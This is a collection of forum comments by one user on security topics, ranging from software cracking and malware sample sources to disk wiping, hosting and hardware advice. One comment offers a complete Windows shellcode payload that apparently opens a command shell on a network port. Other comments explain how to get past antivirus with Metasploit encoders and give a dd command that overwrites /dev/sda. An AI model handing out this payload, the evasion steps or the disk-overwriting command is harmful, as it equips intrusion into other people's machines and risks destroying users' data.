int0x80

I recommend learning to crack software, it's a fun challenge. Here is a good starting point: http://tuts4you.com/download.php?list.17 Keep us updated on your progress. People are more likely to help when you post specific questions showing effort on your part.

There are some interesting ideas in the paper "How to Exit the Matrix". I've seen the paper mirrored at different places so just google if you can't find it. At the time of this post, the paper is currently at http://billstclair.com/matrix/

You can also grab samples from http://www.malwaredomainlist.com/mdl.php Also I heard that Offensive Computing will be returning, but run by a different group of people at http://openmalware.org/

Actually I've good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the op codes in the column to the left of the instructions.

I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).

Try this: shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")

I'm surprised there is internet run to Paper St. You're alone for half a mile in every direction, and you have to shut off the power when it rains ;)

DBAN over PXE to wipe. If you're going to encrypt, you want a layer of random bytes as your last write to the drive before the encryption.

Nice, and thanks! My hosting is on a server I colo. Just the DNS and SSL certs are through Gandi.

There's that. Also your affiliation with the client may (read: will probably) show up when someone pulls a credit report. IMO, my employer, landlord, bank, et al do not need to know with whom I do business. Another fun aspect of GoDaddy is that GoDaddy will fine you if someone complains about your fake/inaccurate whois info. My current registrar is Gandi.net and they have been great; whois privacy is included wrt this thread. I left GoDaddy in a SOPA-induced rage and haven't looked back. Of particular endearment to me was Gandi's No BS policy: https://www.gandi.net/no-bullshit

Never heard of that. Got any evidence or documentation?

Are you ok with having that information published on the internet?

Look into screen or tmux. I have this alias in my ~/.bash_aliases for when I connect and want to re-attach: alias screenr="screen -raAd"

What's your bag? Give people some contextual clues on your interests and experience. Personally, I'd say get your 2 quid back and get a USB drive :]

When I come back into the country, I generally rsync/ssh my data onto a server state-side, then zero the drive on the laptop. That way there is no confusion regarding disk contents. For good measure I give it a little: echo -n "Just us zeroes :]" | dd of=/dev/sda seek=$RANDOM Reference (NSFW) http://pt.reddit.com/r/AskReddit/comments/ndpe1/whats_your_best_it_was_the_most_inappropriate/c38bptk

I haven't done much Windows anti-forensics research, in fact, you've given me some things to look up. One option you could consider is porting my scripts over and running them via cygwin or gnuwin32. If you've got FDE and you're running these wipes in cycles, you should be pretty well set. I haven't seen any Windows stuff that attacks inserted USB devices, but it would be a surprise if such software didn't already exist. Sorry to not be of much help on this one.

I generally like http://hardforum.com when I spec a new system. There is a ton to know about hardware, if you're interested. Here is a good link to get started http://hardforum.com/showthread.php?t=1352290 The people there are also mostly helpful, so when you think you have a system shopped out, post a thread as per their FAQ and wait for feedback. Forum members often find better deals on the hardware you want or even better hardware at lower prices.

Windows Forensic Analysis is a fun read. There is always the 'try before you buy' model.

Very cool! Encrypted volume was not an idea I had considered. That's awesome :D Today has been a long day and I still have lots to do, so give me some time to look through the code in the next few days and then I can adequately contribute to the thread :]

It depends on where the targets are that you are attacking. If they are other guest VMs, then you can set them all to host-only. NAT should be ok in most situations if you need the BT5 VM to hit the internet.

Do what will make you most happy :)

Check out overthewire, smashthestack, and crackmes.de.

You are their professional. Give them your professional opinion as a recommendation or as part of the report in your deliverables. Definitely the latter, at the very least.

What is your limiting resource? Time? Money?

Here is a great opportunity for you to sharpen your RE and assessment skills by playing with the firmware. Check out this series: Exploiting Embedded Systems – Part 1 Exploiting Embedded Systems – Part 2 Exploiting Embedded Systems – Part 3 Exploiting Embedded Systems – Part 4